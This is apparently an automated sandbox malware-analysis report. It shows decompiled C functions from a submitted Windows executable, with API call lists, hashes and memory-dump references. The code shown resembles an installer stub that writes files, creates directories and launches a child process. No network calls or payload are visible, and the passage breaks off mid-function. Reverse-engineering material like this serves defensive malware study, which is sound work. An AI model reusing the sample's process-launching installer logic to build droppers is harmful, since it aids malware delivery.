                              • Part of subcall function 00406133: GetFileAttributesW.KERNELBASE(?,?,00405D38,?,?,00000000,00405F0E,?,?,?,?), ref: 00406138
                              • Part of subcall function 00406133: SetFileAttributesW.KERNELBASE(?,00000000), ref: 0040614C
                            • RemoveDirectoryW.KERNELBASE(?,?,?,00000000,00405F0E), ref: 00405D47
                            • DeleteFileW.KERNEL32(?,?,?,00000000,00405F0E), ref: 00405D4F
                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D67
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: File$Attributes$DeleteDirectoryRemove
                            • String ID:
                            • API String ID: 1655745494-0
                            • Opcode ID: 80ad4dccc83bd5cfbcd7ef077da852fe0cb096cb549a199170c52783d075929e
                            • Instruction ID: f7500ddcb6900c42920b0fa7cdf939b3a50fd8fb6693fff67202f671924a8b23
                            • Opcode Fuzzy Hash: 80ad4dccc83bd5cfbcd7ef077da852fe0cb096cb549a199170c52783d075929e
                            • Instruction Fuzzy Hash: 6DE0E531218A9156C3207734AD0CB5B2A98EF86314F09893FF5A2B11E0D77885078AAD
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00406AE0(void* __ecx, void* _a4) {
                            				long _v8;
                            				long _t6;
                            
                            				_t6 = WaitForSingleObject(_a4, 0x64);
                            				while(_t6 == 0x102) {
                            					E00406A71(0xf);
                            					_t6 = WaitForSingleObject(_a4, 0x64);
                            				}
                            				GetExitCodeProcess(_a4,  &_v8); // executed
                            				return _v8;
                            			}






                            APIs
                            • WaitForSingleObject.KERNEL32(?,00000064), ref: 00406AF1
                            • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00406B06
                            • GetExitCodeProcess.KERNELBASE ref: 00406B13
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: ObjectSingleWait$CodeExitProcess
                            • String ID:
                            • API String ID: 2567322000-0
                            • Opcode ID: c0daa64154bb0774b0f48346674b492318025e1df3185352ae56c24ee987a067
                            • Instruction ID: dffe0f0baa3edeb4a8159ab808a8d66eaa88359a938bc324e0f181ad12cbd91f
                            • Opcode Fuzzy Hash: c0daa64154bb0774b0f48346674b492318025e1df3185352ae56c24ee987a067
                            • Instruction Fuzzy Hash: 36E09236600118FBDB00AB54DD05E9E7B6ADB45704F114036FA05B6190C6B1AE22DA94
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E0040620A(void* _a4, void* _a8, long _a12) {
                            				int _t7;
                            				long _t11;
                            
                            				_t11 = _a12;
                            				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
                            				if(_t7 == 0 || _t11 != _a12) {
                            					return 0;
                            				} else {
                            					return 1;
                            				}
                            			}






                            APIs
                            • WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000,0040FB8E,ndidateListW,00403579,ndidateListW,0040FB8E,00414EF0,00004000,?,00000000,004033A3,00000004), ref: 0040621E
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.322651210.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322670175.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322773729.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: FileWrite
                            • String ID: ndidateListW
                            • API String ID: 3934441357-425658952
                            • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                            • Instruction ID: 398385dbb58ca0a44fa402a726e0ab0b2131cea3ae709c8a1b666252059dd88a
                            • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                            • Instruction Fuzzy Hash: F6E08632141129EBCF10AE548C00EEB375CFB01350F014476F955E3040D330E93087A5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E004061DB(void* _a4, void* _a8, long _a12) {
                            				int _t7;
                            				long _t11;
                            
                            				_t11 = _a12;
                            				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
                            				if(_t7 == 0 || _t11 != _a12) {
                            					return 0;
                            				} else {
                            					return 1;
                            				}
                            			}






                            APIs
                            • ReadFile.KERNELBASE(?,00000000,00000000,00000000,00000000,00414EF0,ndidateListW,004035F5,?,?,004034F9,00414EF0,00004000,?,00000000,004033A3), ref: 004061EF
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: FileRead
                            • String ID: ndidateListW
                            • API String ID: 2738559852-425658952
                            • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                            • Instruction ID: 689b8facb1381159ac92aeccc4703b7db47ce2620db9a14c340ec3ef8a35c8b1
                            • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                            • Instruction Fuzzy Hash: C1E0863250021AABDF10AE518C04AEB375CEB01360F014477F922E2150D230E82187E8
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 92%
                            			E00403371(void* __ecx, long _a4, void* _a8, void* _a12, long _a16) {
                            				long _v8;
                            				long _t21;
                            				long _t22;
                            				void* _t24;
                            				long _t26;
                            				int _t27;
                            				long _t28;
                            				void* _t29;
                            				void* _t30;
                            				long _t31;
                            				long _t32;
                            				long _t36;
                            
                            				_t21 = _a4;
                            				if(_t21 >= 0) {
                            					_t32 = _t21 +  *0x42a2b8;
                            					 *0x420ef4 = _t32;
                            					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
                            				}
                            				_t22 = E00403479(4);
                            				if(_t22 >= 0) {
                            					_t24 = E004061DB( *0x40a01c,  &_a4, 4); // executed
                            					if(_t24 == 0) {
                            						L18:
                            						_push(0xfffffffd);
                            						goto L19;
                            					} else {
                            						 *0x420ef4 =  *0x420ef4 + 4;
                            						_t36 = E00403479(_a4);
                            						if(_t36 < 0) {
                            							L21:
                            							_t22 = _t36;
                            						} else {
                            							if(_a12 != 0) {
                            								_t26 = _a4;
                            								if(_t26 >= _a16) {
                            									_t26 = _a16;
                            								}
                            								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
                            								if(_t27 != 0) {
                            									_t36 = _v8;
                            									 *0x420ef4 =  *0x420ef4 + _t36;
                            									goto L21;
                            								} else {
                            									goto L18;
                            								}
                            							} else {
                            								if(_a4 <= 0) {
                            									goto L21;
                            								} else {
                            									while(1) {
                            										_t28 = _a4;
                            										if(_a4 >= 0x4000) {
                            											_t28 = 0x4000;
                            										}
                            										_v8 = _t28;
                            										_t29 = E004061DB( *0x40a01c, 0x414ef0, _t28); // executed
                            										if(_t29 == 0) {
                            											goto L18;
                            										}
                            										_t30 = E0040620A(_a8, 0x414ef0, _v8); // executed
                            										if(_t30 == 0) {
                            											_push(0xfffffffe);
                            											L19:
                            											_pop(_t22);
                            										} else {
                            											_t31 = _v8;
                            											_a4 = _a4 - _t31;
                            											 *0x420ef4 =  *0x420ef4 + _t31;
                            											_t36 = _t36 + _t31;
                            											if(_a4 > 0) {
                            												continue;
                            											} else {
                            												goto L21;
                            											}
                            										}
                            										goto L22;
                            									}
                            									goto L18;
                            								}
                            							}
                            						}
                            					}
                            				}
                            				L22:
                            				return _t22;
                            			}
















                            APIs
                            • SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 00403396
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: FilePointer
                            • String ID:
                            • API String ID: 973152223-0
                            • Opcode ID: b1bf35b654f0c361909532a2badc84153f12731a676864620281ad9f652e4f28
                            • Instruction ID: 963a71f16df831595788c30304fa9cedbf2cad19eb63879c1ada4fe15c9ed8fa
                            • Opcode Fuzzy Hash: b1bf35b654f0c361909532a2badc84153f12731a676864620281ad9f652e4f28
                            • Instruction Fuzzy Hash: 93319F70200219EFDB129F65ED84E9A3FA8FF00355B10443AF905EA1A1D778CE51DBA9
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 86%
                            			E004015C1(short __ebx, void* __eflags) {
                            				void* _t17;
                            				int _t23;
                            				void* _t25;
                            				signed char _t26;
                            				short _t28;
                            				short _t31;
                            				short* _t34;
                            				void* _t36;
                            
                            				_t28 = __ebx;
                            				 *(_t36 + 8) = E00402DA6(0xfffffff0);
                            				_t17 = E00405FE2(_t16);
                            				_t32 = _t17;
                            				if(_t17 != __ebx) {
                            					do {
                            						_t34 = E00405F64(_t32, 0x5c);
                            						_t31 =  *_t34;
                            						 *_t34 = _t28;
                            						if(_t31 != _t28) {
                            							L5:
                            							_t25 = E00405C16( *(_t36 + 8));
                            						} else {
                            							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
                            							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405C33(_t42) == 0) {
                            								goto L5;
                            							} else {
                            								_t25 = E00405B99( *(_t36 + 8)); // executed
                            							}
                            						}
                            						if(_t25 != _t28) {
                            							if(_t25 != 0xb7) {
                            								L9:
                            								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                            							} else {
                            								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
                            								if((_t26 & 0x00000010) == 0) {
                            									goto L9;
                            								}
                            							}
                            						}
                            						 *_t34 = _t31;
                            						_t32 = _t34 + 2;
                            					} while (_t31 != _t28);
                            				}
                            				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
                            					_push(0xfffffff5);
                            					E00401423();
                            				} else {
                            					E00401423(0xffffffe6);
                            					E00406668(0x436000,  *(_t36 + 8));
                            					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
                            					if(_t23 == 0) {
                            						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                            					}
                            				}
                            				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t36 - 4));
                            				return 0;
                            			}












                            APIs
                              • Part of subcall function 00405FE2: CharNextW.USER32(?,?,00425F50,?,00406056,00425F50,00425F50,766DFAA0,?,766DF560,00405D94,?,766DFAA0,766DF560,00000000), ref: 00405FF0
                              • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
                              • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D
                            • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                              • Part of subcall function 00405B99: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BDC
                            • SetCurrentDirectoryW.KERNELBASE(?,00436000,?,00000000,000000F0), ref: 0040164D
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: CharNext$Directory$AttributesCreateCurrentFile
                            • String ID:
                            • API String ID: 1892508949-0
                            • Opcode ID: 5100f8edfc5c73fcce05ecfe13f7e88f84c01c09c33b7a9b27ef58f2b5b0e964
                            • Instruction ID: a0118e7b9b939ef3ea3e51add98df8039a5aa70d3b8e99a19be4f9c31e9f39fe
                            • Opcode Fuzzy Hash: 5100f8edfc5c73fcce05ecfe13f7e88f84c01c09c33b7a9b27ef58f2b5b0e964
                            • Instruction Fuzzy Hash: 04112231508105EBCF30AFA0CD4099E36A0EF15329B28493BF901B22F1DB3E4982DB5E
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 69%
                            			E00401389(signed int _a4) {
                            				intOrPtr* _t6;
                            				void* _t8;
                            				void* _t10;
                            				signed int _t11;
                            				void* _t12;
                            				signed int _t16;
                            				signed int _t17;
                            				void* _t18;
                            
                            				_t17 = _a4;
                            				while(_t17 >= 0) {
                            					_t6 = _t17 * 0x1c +  *0x42a290;
                            					if( *_t6 == 1) {
                            						break;
                            					}
                            					_push(_t6); // executed
                            					_t8 = E00401434(); // executed
                            					if(_t8 == 0x7fffffff) {
                            						return 0x7fffffff;
                            					}
                            					_t10 = E0040136D(_t8);
                            					if(_t10 != 0) {
                            						_t11 = _t10 - 1;
                            						_t16 = _t17;
                            						_t17 = _t11;
                            						_t12 = _t11 - _t16;
                            					} else {
                            						_t12 = _t10 + 1;
                            						_t17 = _t17 + 1;
                            					}
                            					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                            						 *0x42924c =  *0x42924c + _t12;
                            						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x42924c, 0x7530,  *0x429234), 0);
                            					}
                            				}
                            				return 0;
                            			}












                            APIs
                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                            • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: MessageSend
                            • String ID:
                            • API String ID: 3850602802-0
                            • Opcode ID: 09e122a9c5ca6d14e20a0c17f6d9bb0c47d9e5f073d0cae9cf8d248ab6fa9320
                            • Instruction ID: af17251ef12b8b272b5eaf8d1bef107274ce64b6e67bb2dd4604cf2723900e86
                            • Opcode Fuzzy Hash: 09e122a9c5ca6d14e20a0c17f6d9bb0c47d9e5f073d0cae9cf8d248ab6fa9320
                            • Instruction Fuzzy Hash: 6F012831724220EBEB295B389D05B6A3698E710714F10857FF855F76F1E678CC029B6D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00405C4B(WCHAR* _a4) {
                            				struct _PROCESS_INFORMATION _v20;
                            				int _t7;
                            
                            				0x426750->cb = 0x44;
                            				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x426750,  &_v20); // executed
                            				if(_t7 != 0) {
                            					CloseHandle(_v20.hThread);
                            					return _v20.hProcess;
                            				}
                            				return _t7;
                            			}






                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: CloseCreateHandleProcess
                            • String ID:
                            • API String ID: 3712363035-0
                            • Opcode ID: ab61a979a714f7ec4effc1a78875f568a822f35fd178278bd28005db307d5d14
                            • Instruction ID: 91309136e62a13352d93043ad9bb7922807806bb2ea2f765c8e9c4a894a003d9
                            • Opcode Fuzzy Hash: ab61a979a714f7ec4effc1a78875f568a822f35fd178278bd28005db307d5d14
                            • Instruction Fuzzy Hash: 59E0B6B4600209BFFB109B64EE09F7B7BADFB04648F414565BD51F2190D778A8158A78
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00406A35(signed int _a4) {
                            				struct HINSTANCE__* _t5;
                            				signed int _t10;
                            
                            				_t10 = _a4 << 3;
                            				_t8 =  *(_t10 + 0x40a410);
                            				_t5 = GetModuleHandleA( *(_t10 + 0x40a410));
                            				if(_t5 != 0) {
                            					L2:
                            					return GetProcAddress(_t5,  *(_t10 + 0x40a414));
                            				}
                            				_t5 = E004069C5(_t8); // executed
                            				if(_t5 == 0) {
                            					return 0;
                            				}
                            				goto L2;
                            			}






                            APIs
                            • GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
                            • GetProcAddress.KERNEL32(00000000,?), ref: 00406A62
                              • Part of subcall function 004069C5: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
                              • Part of subcall function 004069C5: wsprintfW.USER32 ref: 00406A17
                              • Part of subcall function 004069C5: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A2B
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                            • String ID:
                            • API String ID: 2547128583-0
                            • Opcode ID: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
                            • Instruction ID: 0464b4a7853edb7079d0776797c383171681067eb8499b99987f1e8ea9f8efb8
                            • Opcode Fuzzy Hash: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
                            • Instruction Fuzzy Hash: E0E086727042106AD210A6745D08D3773E8ABC6711307883EF557F2040D738DC359A79
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 68%
                            			E00406158(WCHAR* _a4, long _a8, long _a12) {
                            				signed int _t5;
                            				void* _t6;
                            
                            				_t5 = GetFileAttributesW(_a4); // executed
                            				asm("sbb ecx, ecx");
                            				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                            				return _t6;
                            			}





                            0x0040615c
                            0x00406169
                            0x0040617e
                            0x00406184

                            APIs
                            • GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\YSpCB8DEek.exe,80000000,00000003), ref: 0040615C
                            • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: File$AttributesCreate
                            • String ID:
                            • API String ID: 415043291-0
                            • Opcode ID: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                            • Instruction ID: 0e1b57c135d9ed337dcee0f1630d7a3ffd6699826ab823f4ff8c6da5104765b0
                            • Opcode Fuzzy Hash: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                            • Instruction Fuzzy Hash: DCD09E71254201AFEF0D8F20DF16F2E7AA2EB94B04F11952CB682940E1DAB15C15AB19
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00406133(WCHAR* _a4) {
                            				signed char _t3;
                            				signed char _t7;
                            
                            				_t3 = GetFileAttributesW(_a4); // executed
                            				_t7 = _t3;
                            				if(_t7 != 0xffffffff) {
                            					SetFileAttributesW(_a4, _t3 & 0x000000fe); // executed
                            				}
                            				return _t7;
                            			}






                            APIs
                            • GetFileAttributesW.KERNELBASE(?,?,00405D38,?,?,00000000,00405F0E,?,?,?,?), ref: 00406138
                            • SetFileAttributesW.KERNELBASE(?,00000000), ref: 0040614C
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: AttributesFile
                            • String ID:
                            • API String ID: 3188754299-0
                            • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                            • Instruction ID: 3e6336b5c460747e2e1e0fbe3c4db8defb42c0044e1a92967a1d29a512d2a4bc
                            • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                            • Instruction Fuzzy Hash: 73D0C972514130ABC2102728AE0889ABB56EB64271B014A35F9A5A62B0CB304C628A98
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00405C16(WCHAR* _a4) {
                            				int _t2;
                            
                            				_t2 = CreateDirectoryW(_a4, 0); // executed
                            				if(_t2 == 0) {
                            					return GetLastError();
                            				}
                            				return 0;
                            			}





                            APIs
                            • CreateDirectoryW.KERNELBASE(?,00000000,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405C1C
                            • GetLastError.KERNEL32 ref: 00405C2A
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: CreateDirectoryErrorLast
                            • String ID:
                            • API String ID: 1375471231-0
                            • Opcode ID: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                            • Instruction ID: 66e62c5d6c7775ff4cea72667941029308d228c48495a605f612c1d2d9e1fc74
                            • Opcode Fuzzy Hash: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                            • Instruction Fuzzy Hash: FBC04C31218605AEE7605B219F0CB177A94DB50741F114839E186F40A0DA788455D92D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E004035F8(long _a4) {
                            				long _t2;
                            
                            				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
                            				return _t2;
                            			}




                            0x00403606
                            0x0040360c

                            APIs
                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032F6,?), ref: 00403606
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: FilePointer
                            • String ID:
                            • API String ID: 973152223-0
                            • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                            • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                            • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                            • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 78%
                            			E00401FA4() {
                            				void* _t9;
                            				char _t13;
                            				void* _t15;
                            				void* _t17;
                            				void* _t20;
                            				void* _t22;
                            
                            				_t19 = E00402DA6(_t15);
                            				E004056CA(0xffffffeb, _t7);
                            				_t9 = E00405C4B(_t19); // executed
                            				_t20 = _t9;
                            				if(_t20 == _t15) {
                            					 *((intOrPtr*)(_t22 - 4)) = 1;
                            				} else {
                            					if( *((intOrPtr*)(_t22 - 0x28)) != _t15) {
                            						_t13 = E00406AE0(_t17, _t20); // executed
                            						if( *((intOrPtr*)(_t22 - 0x2c)) < _t15) {
                            							if(_t13 != _t15) {
                            								 *((intOrPtr*)(_t22 - 4)) = 1;
                            							}
                            						} else {
                            							E004065AF( *((intOrPtr*)(_t22 - 0xc)), _t13);
                            						}
                            					}
                            					_push(_t20);
                            					CloseHandle();
                            				}
                            				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t22 - 4));
                            				return 0;
                            			}










                            APIs
                              • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                              • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                              • Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                              • Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                              • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                              • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                              • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                              • Part of subcall function 00405C4B: CreateProcessW.KERNELBASE ref: 00405C74
                              • Part of subcall function 00405C4B: CloseHandle.KERNEL32(?), ref: 00405C81
                            • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FEB
                              • Part of subcall function 00406AE0: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406AF1
                              • Part of subcall function 00406AE0: GetExitCodeProcess.KERNELBASE ref: 00406B13
                              • Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                            • String ID:
                            • API String ID: 2972824698-0
                            • Opcode ID: 98c10e394aa7211d00c312830497ac903b837474ab48397c41695a6fe6023c65
                            • Instruction ID: 7fe263eab699b123ac8c37dffe14ee58438593542e676086741668bd6549bbba
                            • Opcode Fuzzy Hash: 98c10e394aa7211d00c312830497ac903b837474ab48397c41695a6fe6023c65
                            • Instruction Fuzzy Hash: 3DF09072905112EBDF21BBA59AC4DAE76A4DF01318B25453BE102B21E0D77C4E528A6E
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 95%
                            			E00405809(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                            				struct HWND__* _v8;
                            				long _v12;
                            				struct tagRECT _v28;
                            				void* _v36;
                            				signed int _v40;
                            				int _v44;
                            				int _v48;
                            				signed int _v52;
                            				int _v56;
                            				void* _v60;
                            				void* _v68;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				struct HWND__* _t94;
                            				long _t95;
                            				int _t100;
                            				void* _t108;
                            				intOrPtr _t130;
                            				struct HWND__* _t134;
                            				int _t156;
                            				int _t159;
                            				struct HMENU__* _t164;
                            				struct HWND__* _t168;
                            				struct HWND__* _t169;
                            				int _t171;
                            				void* _t172;
                            				short* _t173;
                            				short* _t175;
                            				int _t177;
                            
                            				_t169 =  *0x429244;
                            				_t156 = 0;
                            				_v8 = _t169;
                            				if(_a8 != 0x110) {
                            					if(_a8 == 0x405) {
                            						CloseHandle(CreateThread(0, 0, E0040579D, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
                            					}
                            					if(_a8 != 0x111) {
                            						L17:
                            						_t171 = 1;
                            						if(_a8 != 0x404) {
                            							L25:
                            							if(_a8 != 0x7b) {
                            								goto L20;
                            							}
                            							_t94 = _v8;
                            							if(_a12 != _t94) {
                            								goto L20;
                            							}
                            							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
                            							_a8 = _t95;
                            							if(_t95 <= _t156) {
                            								L36:
                            								return 0;
                            							}
                            							_t164 = CreatePopupMenu();
                            							AppendMenuW(_t164, _t156, _t171, E004066A5(_t156, _t164, _t171, _t156, 0xffffffe1));
                            							_t100 = _a16;
                            							_t159 = _a16 >> 0x10;
                            							if(_a16 == 0xffffffff) {
                            								GetWindowRect(_v8,  &_v28);
                            								_t100 = _v28.left;
                            								_t159 = _v28.top;
                            							}
                            							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
                            								_v60 = _t156;
                            								_v48 = 0x423748;
                            								_v44 = 0x1000;
                            								_a4 = _a8;
                            								do {
                            									_a4 = _a4 - 1;
